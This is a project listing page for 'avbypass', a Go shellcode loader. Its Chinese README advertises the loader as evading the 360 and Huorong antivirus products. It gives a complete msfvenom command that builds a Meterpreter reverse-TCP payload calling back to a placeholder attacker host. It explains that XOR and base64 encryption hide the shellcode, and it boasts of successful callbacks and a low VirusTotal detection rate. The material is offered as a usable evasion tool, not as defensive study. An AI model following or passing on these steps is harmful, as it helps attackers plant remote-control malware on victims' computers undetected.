All Projects → Shu1L → avbypass

Shu1L / avbypass

Licence: other
简单go加载器实现免杀360 火绒

Programming Languages

go
31211 projects - #10 most used programming language

avbypass

使用

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin

使用程序生成加密的shellcode后,填入指定位置,编译执行即可。

通过xor和base64多层加密shellcode实现的go加载器bypassav,

实测在开启360和火绒的情况下msf正常上线

virustotal结果 6/67,后续有时间会慢慢修改

# avbypass

avbypass

"# avbypass"

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].